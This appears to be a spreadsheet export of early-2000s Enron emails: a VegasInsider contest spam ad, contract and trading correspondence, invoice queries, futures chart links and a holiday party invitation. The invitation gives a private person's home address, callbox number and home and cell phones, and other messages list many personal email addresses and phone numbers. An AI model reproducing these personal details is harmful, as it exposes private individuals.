=09By clicking here, you  can win $2500 by simply picking the winners in th=_x000D_
is=20_x000D_
week's football games.  Sign-up is FREE! =20_x000D_
=09_x000D_
=09And to help you win the cash, VegasInsider.com  gives you a free look at=_x000D_
 the=20_x000D_
odds direct from Las Vegas as well as the  best analysis and winning advice=_x000D_
=20_x000D_
from the world's best handicappers. Put  our knowledge to work for you. =20_x000D_
=09_x000D_
=09Sign up now for your free chance to win $2500 in Beat The  Spread this w=_x000D_
eek. =20_x000D_
=09_x000D_
=09It's free. It's $2500. And it can be yours.=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Top  5 ways to spend BEAT THE SPREAD Winnings!_x000D_
=09_x000D_
=09_x000D_
=095. Get a new girlfriend or two. (Let's face it, chicks  dig guys with ca=_x000D_
sh!) =20_x000D_
=09_x000D_
=094. Put in that hot tub you've been thinking about. (Let's  face it, chic=_x000D_
ks=20_x000D_
dig hot tubs!) =20_x000D_
=09_x000D_
=093. Put a down payment on that new convertible you've been  thinking abou=_x000D_
t.=20_x000D_
(Let's face it, chicks dig guys in convertibles!) =20_x000D_
=09_x000D_
=092. Tell your "better half" you won $500 in an online  football contest, =_x000D_
and=20_x000D_
you're giving it all to her because she 'means  the world to you.' Then blo=_x000D_
w=20_x000D_
the remaining $2000 on lap dances!  (Ladies, you know how guys are!) =20_x000D_
=09_x000D_
=091. We=01,re not talking $500, not $1000, not $1,500, not  $2000 . . . BU=_x000D_
T $2500!=20_x000D_
For goodness sake, use your imagination! =20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09VegasInsider.com is giving away $2500 every week in its FREE 'Beat The =_x000D_
=20_x000D_
Spread' Football Contest, and that's more than almost anybody in =20_x000D_
cyberspace. =20_x000D_
=09_x000D_
=09So just go to VegasInsider.com  to register and start winning today! =20_x000D_
=09_x000D_
=09VegasInsider.com -- The Global Leader In Sports Gaming Information. =20_x000D_
=09_x000D_
=09Participants must be 18 years of age or older to play. See complete  rul=_x000D_
es=20_x000D_
for eligibility requirements. =20_x000D_
=09_x000D_
=09=09?=09?_x000D_
=09=09=09_x000D_
=09=09=09_x000D_
=09=09=09?_x000D_
=09=09=09_x000D_
=09=09=09_x000D_
=09=09=09JOIN THE  WINNERS!_x000D_
=09=09=09_x000D_
=09=09=09_x000D_
=09=09=09Week 1  winner: Bruce Hall=20_x000D_
=09=09=09_x000D_
=09=09=09Week  2 winner: Frank Walker Jr.=20_x000D_
=09=09=09_x000D_
=09=09=09Week  3 winner: Nancy Strayer=20_x000D_
=09=09=09_x000D_
=09=09=09Week  4 winner: Edmund Reyes=20_x000D_
=09=09=09_x000D_
=09=09=09Week  5 winner: Bob Tranilla=20_x000D_
=09=09=09_x000D_
=09=09=09Week  6 winner: Brad Olson=20_x000D_
=09=09=09_x000D_
=09=09=09Week  7 winner: Ruthi Bryant=20_x000D_
=09=09=09_x000D_
=09=09=09Week  8 winner: Winner notified=20_x000D_
=09=09=09_x000D_
=09=09=09Week  9 winner: Matt Posiowaych=20_x000D_
=09=09=09_x000D_
=09=09=09Week  10 winner: Mark DeStefano=20_x000D_
=09=09=09_x000D_
=09=09=09Week  11 winner: Winner notified=20_x000D_
=09=09=09_x000D_
=09=09=09Week  12 winner: It could be you! =20_x000D_
=09=09=09_x000D_
=09=09=09_x000D_
_x000D_
_x000D_
VegasInsider.com Privacy  Statement_x000D_
Send questions and comments to oddshelp@vegasinsider.com_x000D_
Or  call us at 1-800-211-4759_x000D_
Copyright , 2000, VegasInsider.com, The  Global Leader In Sports Gaming=20_x000D_
Information. All rights reserved. </t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 02:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Confimation Template ("Merchant")</t>
  </si>
  <si>
    <t xml:space="preserve">Chris:_x000D_
_x000D_
We should chat.  Per the ISDA, ENA is the calc agent and we have already _x000D_
agreed to usual Market Disruption Events and fallbacks in the ISDA.  If you _x000D_
want to change the ISDA agreement, then we can consider the items which _x000D_
Merchant has included in the draft._x000D_
_x000D_
As calc agent, we should create a draft and send the form to you for review.  _x000D_
However, I do need you to explain/verify Floating Price B.  And verify _x000D_
rounding convention which differs from our standard._x000D_
_x000D_
Please call to discuss. _x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Chris H Foster_x000D_
	04/23/2001 06:49 PM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Confimation Template_x000D_
_x000D_
Sara:_x000D_
_x000D_
I am looking at a transaction with MErchant Energy Group.  We have an ISDA _x000D_
with them.  It is a financial tolling deal where we will be a fixed price _x000D_
payor for power and gas and we will pay them an option premium.  They _x000D_
forwarded the attached pro forma to illustrate how the deal would be _x000D_
papered.  Can you please review the attached and let me know if it looks OK _x000D_
or what changes are required?  They indicated an interest to transact late _x000D_
this week or early next._x000D_
_x000D_
C_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 04/23/2001 _x000D_
04:31 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Brock, Travis" &lt;BrockT@merchantenergy.com&gt;                           _x000D_
04/23/2001 02:30 PM_x000D_
	_x000D_
_x000D_
To: "Chris Foster (E-mail)" &lt;chris.h.foster@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Confimation Template_x000D_
_x000D_
_x000D_
Attached is a sample confirmation template for 100 MW's Sep01-Nov01.  We can_x000D_
use this as a starting point._x000D_
_x000D_
 &lt;&lt;Swap Confirm Template.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Travis J. Brock_x000D_
Merchant Energy Group of the Americas_x000D_
brockt@merchantenergy.com_x000D_
Phone: (410) 295-1734_x000D_
Fax: (410) 295-1705_x000D_
_x000D_
_x000D_
CONFIDENTIALITY NOTICE: This e-mail may contain TRADE SECRET, PRIVILEGED_x000D_
AND/OR CONFIDENTIAL INFORMATION intended only for the use of the addressee._x000D_
If you are not the addressee, or the person responsible for delivering it to_x000D_
the person addressed, you may not copy or deliver this to anyone else.  If_x000D_
you received this e-mail by mistake, please immediately notify us by_x000D_
returning the original message to the sender._x000D_
_x000D_
_x000D_
 - Swap Confirm Template.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 05:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">mark, _x000D_
_x000D_
Can you look into this?  You may need to check with Mary or Trisha on _x000D_
transport capacity tickets for Dec forward._x000D_
_x000D_
D_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 02/26/2001 _x000D_
01:24 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Megan Parker @ ENRON                           02/26/2001 12:51 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Tenaska IV Transport 10/00_x000D_
_x000D_
Have you been able to work out these transport pricing differences for Oct. _x000D_
2000?  We have only been able to pay $4,000.00 of the $28,000.00 invoice.  _x000D_
The pricing for Nov. 2000 (deal 452491) has problems too.  We have $0.01 for _x000D_
11/3 at meter 20014804 and TXU is billing us $0.10 at meter 25000200 and _x000D_
$0.02 at meter 20014903 for the entire month._x000D_
_x000D_
I have also noticed that we are not accruing any transport for Dec 2000 _x000D_
forward.  We have received the Dec. 2000 invoice from TXU, but we do not have _x000D_
a deal to pay them.  We should be getting Jan. 2001 next week.  Is there a _x000D_
deal for these months?  _x000D_
_x000D_
Megan_x000D_
---------------------- Forwarded by Megan Parker/Corp/Enron on 02/26/2001 _x000D_
12:28 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Megan Parker                           01/05/2001 04:12 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Tenaska IV Transport 10/00_x000D_
_x000D_
I took a look at the transport for TXU Lone Star for Tenaska IV for 10/00.  _x000D_
We mostly have price differences, but one deal needs some days added.  Let me _x000D_
know if you need copies of the invoices.  The meters below are delivery _x000D_
meters.  I wasn't sure what the receipt meters would be._x000D_
_x000D_
Deal 452491, Meter 20014903  Need to add days 24-26 and 28-31 _x000D_
     Need to check rate - We show $0.01 and we were billed $0.02_x000D_
_x000D_
Deal 452491, Meter 25000200  Need to check rate - We show $0.02 and we were _x000D_
billed $0.10_x000D_
_x000D_
Deal 452475, Meter 25000200  Need to check rate - We show prices from $0.005 _x000D_
to $0.02_x000D_
      and we were billed $0.11_x000D_
_x000D_
Thanks,_x000D_
Megan_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 06:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Another Bet</t>
  </si>
  <si>
    <t xml:space="preserve">David,_x000D_
_x000D_
Sounds like a safe bet._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
From: David Port/ENRON@enronXgate on 05/07/2001 12:57 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Another Bet_x000D_
_x000D_
Vince_x000D_
_x000D_
I here you are running abook on how quickly we can implement Convolution VaR _x000D_
for power and since I am up against a summer deadline for this I felt I _x000D_
should take the other side._x000D_
_x000D_
So how about I buy you dinner if I get it done ?_x000D_
_x000D_
Rgds_x000D_
DP_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 30 Sep 2001 20:32:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>how many bcf are you at now this year?</t>
  </si>
  <si>
    <t>and mtm</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alouison@hunton.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'szisman@ect.enron.com', 'cthompson@bracepatt.com', 'prollin@aesc.com', 'aroffwarg@bracepatt.com', 'ben.f.jacoby@enron.com', 'fred.mitro@enron.com', 'chris.booth@enron.com', 'shase@aesc.com'})</t>
  </si>
  <si>
    <t>RE: Assignor's Obligations -- Due Diligence</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning._x000D_
_x000D_
Further to Steve's comments below, I am also wondering what the new language_x000D_
in the Assignment of Interests adds or is intended to add beyond the_x000D_
language in the prior paragraph 2.  Are there obligations of VLDC outside_x000D_
the Haywood LLC that are intended to be assigned by the new language?  If_x000D_
so, then as Steve suggests, we need to make sure that AES knows what the_x000D_
universe includes and gets related reps and warranties.  The reps and_x000D_
warranties under the SPA reach only to the obligations of Haywood._x000D_
_x000D_
Thanks_x000D_
_x000D_
Audrey._x000D_
-----Original Message-----_x000D_
From: Steve Hase [mailto:shase@aesc.com]_x000D_
Sent: Thursday, May 10, 2001 8:27 AM_x000D_
To: aroffwarg@bracepatt.com; prollin@aesc.com; aroffwarg@bracepatt.com;_x000D_
cthompson@bracepatt.com; szisman@ect.enron.com; ben.f.jacoby@enron.com;_x000D_
chris.booth@enron.com; fred.mitro@enron.com; kay.mann@enron.com;_x000D_
alouison@hunton.com_x000D_
Subject: Assignor's Obligations -- Due Dligence_x000D_
_x000D_
_x000D_
Ben and Aaron,_x000D_
_x000D_
We note in the Assignment of Interest document sent yesterday, there is a_x000D_
new section 2, whereby AES would be assuming all of the obligations of_x000D_
Volunter Land Development Company._x000D_
_x000D_
We need to perform due diligence on what those obligations are and whether_x000D_
they have changed since the SPA was executed.  We need the following_x000D_
information for determining what obligations VLDC has incurred:_x000D_
_x000D_
1)  financial statements of the LLC_x000D_
What debts does the LLC owe and to whom?_x000D_
2)  list of all the agreements entered into by the company_x000D_
(to my knowledge, there is the system impact study agreemt with TVA_x000D_
Any other agreements with TVA, like a Keep Whole letter?_x000D_
3)  copies of any new agreements not already delivered in the Binder dated_x000D_
Nov 2000?_x000D_
4)  any tax agreements with the County or any other public entity?_x000D_
5) any amendments to your land option agreements with Mann or English?_x000D_
_x000D_
I'd appreciate your review of these matters as soon as possible to keep_x000D_
our scheduled closing on track._x000D_
_x000D_
I'll be meeting with Ben at 8:00CT.  Our call remains at 2:00PM CT same #_x000D_
as before._x000D_
_x000D_
Steve Hase_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 10:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'mog.heu@enron.com', 'chris.figueroa@enron.com', 'steven.south@enron.com', 'sheetal.patel@enron.com', 'john.griffith@enron.com', 'eric.feitler@enron.com', 'matthew.lenhart@enron.com', 'dutch.quigley@enron.com'})</t>
  </si>
  <si>
    <t>User Ids</t>
  </si>
  <si>
    <t xml:space="preserve">Please send me your user id's_x000D_
---------------------- Forwarded by Ina Rangel/HOU/ECT on 04/26/2001 05:27 PM _x000D_
---------------------------_x000D_
From: Amanda Huble/ENRON@enronXgate on 04/24/2001 09:05 AM_x000D_
To: Ina Rangel/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: User Ids_x000D_
_x000D_
Do you happen to have the user ids for the following people?  I have a list _x000D_
that you sent me before, but these people were not on there.  The reason for _x000D_
this is security for the site._x000D_
_x000D_
Vicki Versen_x000D_
Scott Hendrickson_x000D_
Dutch Quigley_x000D_
John Griffith_x000D_
Matt Lenhart_x000D_
steve South_x000D_
Susan Scott_x000D_
Chris Figueroa_x000D_
Eric Feitler_x000D_
Mog Heu_x000D_
Sheetal Patel_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Amanda K. Huble _x000D_
Gas Fundamentals _x000D_
Phone: (713) 853-4384_x000D_
Pager: (877) 482-0772_x000D_
Fax: (713) 646-8453_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 3 Mar 1997 03:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PGE/Commercial Support Group Meeting, 32C1</t>
  </si>
  <si>
    <t>_x000D_
Per Geoff Roberts</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 05:27:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>ALL daily charts and matrices as hot links 10/19</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
_x000D_
Crude     http://www.carrfut.com/research/Energy1/crude25.pdf_x000D_
Natural Gas     http://www.carrfut.com/research/Energy1/ngas25.pdf_x000D_
Distillate     http://www.carrfut.com/research/Energy1/hoil25.pdf_x000D_
Unleaded     http://www.carrfut.com/research/Energy1/unlded25.pdf_x000D_
_x000D_
Dec WTI/Brent Spread_x000D_
http://www.carrfut.com/research/Energy1/clz-qoz.pdf_x000D_
Dec Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack.pdf_x000D_
Dec Gas Crack     http://www.carrfut.com/research/Energy1/gascrack.pdf_x000D_
Dec/May Heat Spread     http://www.carrfut.com/research/Energy1/hoz-hok.pdf_x000D_
Jan/Feb Heat Spread     http://www.carrfut.com/research/Energy1/hof-hog.pdf_x000D_
Nov Gas/Heat Spread     http://www.carrfut.com/research/Energy1/hux-hox.pdf_x000D_
Dec Gas/Heat Spread     http://www.carrfut.com/research/Energy1/huz-hoz.pdf_x000D_
Nov/Mar Unlead Spread_x000D_
http://www.carrfut.com/research/Energy1/hux-huh.pdf_x000D_
_x000D_
Nat Gas Strip Matrix_x000D_
http://www.carrfut.com/research/Energy1/StripmatrixNG25.pdf_x000D_
Nat Gas Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixNG25.pdf_x000D_
_x000D_
Crude and Products Spread Matrix_x000D_
http://www.carrfut.com/research/Energy1/SpreadmatrixCL25.pdf_x000D_
_x000D_
_x000D_
_x000D_
Scott Oblander_x000D_
312-762-1015_x000D_
312-762-1014 fax_x000D_
Carr Futures_x000D_
150 S. Wacker_x000D_
Suite 1500_x000D_
Chicago, IL 60606</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 06:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: New Bongo Partners</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 11/28/2000 _x000D_
02:09 PM ---------------------------_x000D_
_x000D_
_x000D_
shirley.s.elliott@citicorp.com on 11/28/2000 12:32:55 PM_x000D_
To: Matthew.Lenhart@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: FW: New Bongo Partners_x000D_
_x000D_
_x000D_
this is pretty funny.  when you want to try sushi, give me a call.  i'll tell_x000D_
you all the good stuff to get and we'll try some soy beans.  they are so good_x000D_
for you and taste good too!  they're a great snack -- tons of protein, very_x000D_
little fat and carbs.  you spelled it "discusting."_x000D_
_x000D_
s._x000D_
_x000D_
-----Original Message-----_x000D_
From: mowilliamson [SMTP:mowilliamson@deloitte.com]_x000D_
Sent: Tuesday, November 28, 2000 12:11 PM_x000D_
To: shirley.s.elliott_x000D_
Cc: mowilliamson_x000D_
Subject: FW: New Bongo Partners_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Marix, Todd @ Houston Galleria [mailto:tmarix@cbre.com]_x000D_
Sent: Tuesday, November 28, 2000 12:07 PM_x000D_
To: 'Mimi Marix'; 'Molly Williamson'_x000D_
Subject: New Bongo Partners_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From:   Banks, Tre @ Houston Galleria_x000D_
Sent:   Tuesday, November 28, 2000 11:22 AM_x000D_
To:     Marix, Todd @ Houston Galleria_x000D_
Subject:        FW: wooderson_x000D_
_x000D_
&gt; say, man, you gotta joint..............it'd be a lot cooler if you_x000D_
&gt; did!!!!!!_x000D_
&gt;  &lt;&lt;new_bongo_partners.jpg&gt;&gt;_x000D_
&lt;&lt;new_bongo_partners.jpg&gt;&gt;_x000D_
_x000D_
- This message (including any attachments) contains confidential information_x000D_
intended for a specific individual and purpose, and is protected by law.  -_x000D_
If you are not the intended recipient, you should delete this message and_x000D_
are hereby notified that any disclosure, copying, or distribution of this_x000D_
message, or the taking of any action based on it, is strictly prohibited._x000D_
  _x000D_
  _x000D_
_x000D_
?_x000D_
-----Original Message-----_x000D_
From: Marix, Todd @ Houston Galleria  [mailto:tmarix@cbre.com]_x000D_
Sent: Tuesday, November 28, 2000 12:07  PM_x000D_
To: 'Mimi Marix'; 'Molly Williamson'_x000D_
Subject: New Bongo  Partners_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message----- _x000D_
From:?? Banks,  Tre @ Houston Galleria _x000D_
Sent:?? Tuesday, November  28, 2000 11:22 AM _x000D_
To:???? Marix,  Todd @ Houston Galleria _x000D_
Subject:??????? FW: wooderson _x000D_
_x000D_
&gt; say, man, you gotta joint..............it'd be a  lot cooler if you _x000D_
&gt; did!!!!!!  _x000D_
&gt;? &lt;&lt;new_bongo_partners.jpg&gt;&gt;  _x000D_
&lt;&lt;new_bongo_partners.jpg&gt;&gt; _x000D_
_x000D_
 - new_bongo_partners.jpg_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Oct 2000 08:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CHANGE IN SCHEDULE MID C</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
I would suggest calling Duke early to make sure that they are aware of this _x000D_
obligation.    They need to resupply for this hour, regardless of their cost._x000D_
If they pull up lame,  of  course,  we will resupply and bill them LD._x000D_
If you have major problems with this,  dont hesitate to call Donald or myself._x000D_
_x000D_
Thanks,_x000D_
JMF_x000D_
---------------------- Forwarded by John M Forney/HOU/ECT on 10/23/2000 05:23 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Mike Purcell_x000D_
10/23/2000 03:23 PM_x000D_
To: Portland Shift_x000D_
cc:  _x000D_
Subject: CHANGE IN SCHEDULE MID C_x000D_
_x000D_
 Schedule cut to 0 for hr 24 on the 24th.  The new Tag number is 10604 , Duke _x000D_
will re-supply realtime._x000D_
Thanks _x000D_
Mike_x000D_
If you have any questions call Donald 702-0415_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Sep 1999 23:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'psellers@haas.berkeley.edu', 'steve.mccarthy@robertmondavi.com', 'cindy.nagy@robertmondavi.com', 'smaloney@worldwrapps.com', 'greg.brady@robertmondavi.com', 'bdouglas@jps.net', 'bgrowney@gunder.com', 'kennyd@hdcdojnet.state.ca.us', 'eldon@interx.net', 'jeff.dasovich@enron.com', 'mikeh@thirdage.com', 'csellers@gunder.com', 'gonarvco@aol.com', 'amozes@covad.com', 'cwaters@brodia.com', 'devans@napanet.net', 'mickey.lombardi@robertmondavi.com', 'nancy.sellers@mondavi.com', 'barrie.eddy@robertmondavi.com', 'cary@u-know.com'})</t>
  </si>
  <si>
    <t>Week 3</t>
  </si>
  <si>
    <t>Congratulations to 2 new weekly winners and our first repeat:  JAM took 1st_x000D_
for the week and Prentice was 3rd.  Nancy had her second weekly win, placing_x000D_
2nd._x000D_
_x000D_
Barrie maintains her rookie of the year honors even though she had a very_x000D_
bad week, and Donna who ended in last place last year is now in 6th place._x000D_
_x000D_
Big ranking swaps - JAM went from 14th to a tie for 3rd and Prentice went_x000D_
from 11th to a tie for 3rd.  The bottom 5 remained unchanged -_x000D_
_x000D_
Week 3 results are on the Week #3 tab.  Cumulative payouts are on the Payout_x000D_
tab.  Cumulative points are on the Total tab._x000D_
_x000D_
My regular e-mail is working fine:  eldon@interx.net.  If you send your_x000D_
picks by e-mail, please use this address._x000D_
_x000D_
_x000D_
_x000D_
 - Scores99.xls</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 16:03:01 -0800 (PST)</t>
  </si>
  <si>
    <t>CC: Match.com  - You've Got Mail: Hello Again!</t>
  </si>
  <si>
    <t>This is a copy of your message sent to Poblet@talkmatch.com --&gt;_x000D_
_x000D_
Thanks for the email.  It was my first one!  I just got everything set up on this service and now I'm curious.  I liked what I read in your profile, but I'm wondering why you didn't include a picture?  I think you have me at a disadvantage.  I'll keep this short incase I'm doing something wrong and this email comes back to me.  Drop me a line and we'll chat._x000D_
_x000D_
Paul_x000D_
_x000D_
_x000D_
_x000D_
*********************************************************_x000D_
_x000D_
ADDITIONAL TIPS from Match.com:_x000D_
_x000D_
Our anonymous re-mailer will strip away your real email address, so _x000D_
that it will NOT appear in the 'From:' line._x000D_
_x000D_
You may also contact this person from their Match.com profile by _x000D_
clicking 'Contact this person' and composing your message directly from the _x000D_
site._x000D_
_x000D_
However:_x000D_
_x000D_
* Check to ensure that your email address is not in the BODY of your _x000D_
message as we are unable to remove these._x000D_
_x000D_
* Check to ensure that you REMOVE ANY AUTOMATIC SIGNATURE at the end of _x000D_
_x000D_
your email. And note that you cannot use 'Cc:' or 'Bcc:' if you want _x000D_
your email to remain anonymous._x000D_
_x000D_
Match.com does not monitor private email between members, nor are we _x000D_
liable for the content of these messages. All members are bound by our _x000D_
Match.com Service Agreement.</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 06:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mreuter@kslaw.com', 'chris.booth@enron.com', 'ben.jacoby@enron.com', 'jkeffer@kslaw.com'})</t>
  </si>
  <si>
    <t>Assignment and assumption agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the current form of the assignment agreement.  I'm awaiting final _x000D_
approval from Finance, but I think we should get this in front of GE.  Ben, _x000D_
do you or Chris want to handle this, or shall I?_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 05:16:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>daily distillate and unleaded charts as attachments 6/8</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  ? 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now in the most recent version of Adobe Acrobat 4.0 and they_x000D_
should print clearly from Adobe Acrobat Reader 3.0 or higher. Adobe Acrobat_x000D_
Reader 4.0 may be downloaded for FREE from www.adobe.com._x000D_
_x000D_
(See attached file: unlded33.pdf)(See attached file: hoil33.pdf)_x000D_
 - unlded33.pdf _x000D_
 - hoil33.pdf </t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 05:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'erin.hall@enron.com', 'justin_souza@hotmail.com', 'michael.d.peel@intel.com', 'nixo9362@uidaho.com', 'lisa.gang@enron.com', 'londo98@hotmail.com', 'jeffrey.oh@enron.com', 'lbjork@thprd.com', 'emily.butler@enron.com', 'mmccli@hotmail.com', 'twone1@hotmail.com', 'teri.whitcomb@enron.com', '7599039@skytel.com', 'robyn.g.herskowitz@intel.com', 'p_mouchakkaa@hotmail.com', 'matt@castle-pt.com', 'paul.v.hartley@intel.com', 'jaimep@ctr.com', 'jennifermaecarter@hotmail.com', 'markmc@ctr.com', 'jakep_gonavy@yahoo.com', 'rschoenheit@hotmail.com', 'todd.perry@enron.com', 'neil@hrcivil.com', 'diana.willigerod@enron.com', 'carla.hoffman@enron.com', 'dswails@kozmo.com', 'jlarson@impacservices.com', 'kylemartens@go.com', 'mark.guzman@enron.com', 'karenannmc@hotmail.com', 'jeffmcgillis@hotmail.com', 'roberts_audrey@hotmail.com', 'black_coffee69@hotmail.com', 'jamiestoner@hotmail.com', 'tiffanyd@metfamily.org', 'matthewx.goodstein@intel.com'})</t>
  </si>
  <si>
    <t>Holiday party info/reminder</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all! I hope things are doing well for you!_x000D_
_x000D_
I just wanted to send out a reminder about the holiday party... If you have _x000D_
not yet responded, please let me know if you are available (even for an hour _x000D_
or so early in the party). Your friends are welcome to come as well!_x000D_
_x000D_
A few things to keep in mind:_x000D_
1) This is a Bring Your Own Alcohol event. Mixers will be available; however, _x000D_
if you anticipate that you will need mixers other than sodas, bloody mary _x000D_
mix, or juice (and ice and limes and lemons...) please let me know today._x000D_
2) The party hostess would like everyone to drink responsibly. If you _x000D_
anticipate you will be consuming large amounts of "cheer", please bring a _x000D_
pillow and blanket (sorry, I don't have enough), or plan on taking a cab _x000D_
to/from the party. BE SAFE!_x000D_
3) Finally, DIRECTIONS:_x000D_
I am located on Naito Pkwy/Front Ave south of the Broadway Bridge and north _x000D_
of the Steel Bridge. I'm in the wonderfully colorful orange-red/yucky-green _x000D_
apartments across from the red apartments._x000D_
 Get on to Front Ave/Naito Pkwy (if you don't know how, look at a map or give _x000D_
me a call)_x000D_
 From Front/Naito going NORTH: go underneath the Steel Bridge and over the _x000D_
railroad tracks. My apartment is on the left._x000D_
 From Front/Naito going SOUTH: go underneath the Broadway bridge. My _x000D_
apartment is to the right._x000D_
 Park at a meter. =)_x000D_
 My building number is 815. Dial 214 on the callbox to be buzzed in._x000D_
 [Alternate entrance: walk up the stairs next to the leasing office. My _x000D_
apartment (back entry) is the THIRD patio on the right.]_x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
G_x000D_
503.242.1315-hm_x000D_
503.807.7858-cell_x000D_
_x000D_
---------------------- Forwarded by Grace Rodriguez/PDX/ECT on 12/21/2000 _x000D_
09:16 AM ---------------------------_x000D_
_x000D_
_x000D_
HAPPY HOLIDAYS!!!_x000D_
_x000D_
You are invited to_x000D_
_x000D_
Grace's 2nd Annual Holiday Party_x000D_
_x000D_
7pm, Friday, December 22nd_x000D_
_x000D_
815 NW Naito Parkway, Apartment 214_x000D_
_x000D_
Light hors d'oeuvres, non-alcoholic beverages and mixers will be provided._x000D_
_x000D_
Please BYO-liquor, beer &amp; wobbly pops (&lt;--MP)_x000D_
_x000D_
?_x000D_
_x000D_
Floor, couch, chair or table space will be provided for those who drink too _x000D_
much and can't drive home. (Bring your own blankets!)_x000D_
_x000D_
?_x000D_
_x000D_
Sorry for the late notice, but let me know if you can make it by Wednesday, _x000D_
December 20th. (503) 242-1315._x000D_
_x000D_
See you then!_x000D_
_x000D_
-Grace_x000D_
_x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Dec 2001 06:29:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shood@manfinancial.com'})</t>
  </si>
  <si>
    <t>enron pos</t>
  </si>
  <si>
    <t xml:space="preserve"> - enron breakdown  12-10 BOD.xls </t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 08:37:01 -0800 (PST)</t>
  </si>
  <si>
